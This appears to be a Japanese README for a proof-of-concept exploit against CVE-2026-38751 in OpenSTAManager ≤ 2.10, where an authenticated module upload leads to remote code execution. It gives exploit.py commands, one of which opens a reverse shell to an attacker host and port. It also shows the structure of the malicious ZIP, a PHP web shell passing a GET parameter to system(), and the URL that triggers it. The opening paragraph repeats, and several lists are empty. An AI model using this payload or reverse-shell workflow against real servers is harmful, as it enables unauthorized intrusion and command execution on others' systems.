
このリポジトリには、OpenSTAManager ≤ 2.10 に影響する CVE-2026-38751 用の概念実証 (PoC) エクスプロイトが含まれています。この脆弱性により、認証された攻撃者がモジュール更新機能を介して悪意のあるモジュールをアップロードでき、任意のファイルアップロードとリモートコード実行 (RCE) につながります。
このリポジトリには、OpenSTAManager ≤ 2.10 に影響する CVE-2026-38751 の概念実証 (PoC) エクスプロイトが含まれています。この脆弱性により、認証済みの攻撃者がモジュール更新機能を介して悪意のあるモジュールをアップロードでき、任意のファイルアップロードとリモートコード実行 (RCE) につながります。
modules/aggiornamenti/upload_modules.php)モジュール更新機能は、認証済みユーザーがファイルの内容や実行境界を適切に検証せずに ZIP ベースのモジュールをアップロードすることを許可します。攻撃者は PHP ペイロードを含む悪意のあるモジュールを細工でき、これらは Web ルートに展開され、アプリケーションコンテキストを介して実行されます。その結果、次のことが発生します:
悪用に成功すると、以下が可能になります:
python exploit.py --build
以下を作成します:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
オプションのリバースシェルモード:
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
ペイロード例
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
成功した場合、次のエンドポイントがシステムコマンドを実行します:
/modules/run/evil.php?cmd=id
このプロジェクトは以下を目的としています:
明示的な許可なしにシステムに対して使用しないでください。
注意事項
検出はサーバー設定によって異なる場合があります。 一部のデプロイメントでは、モジュールディレクトリでの PHP の直接実行が無効になっている場合があります。 モジュールのアクティベーションのタイミングによっては、リトライが必要になる場合があります。
謝辞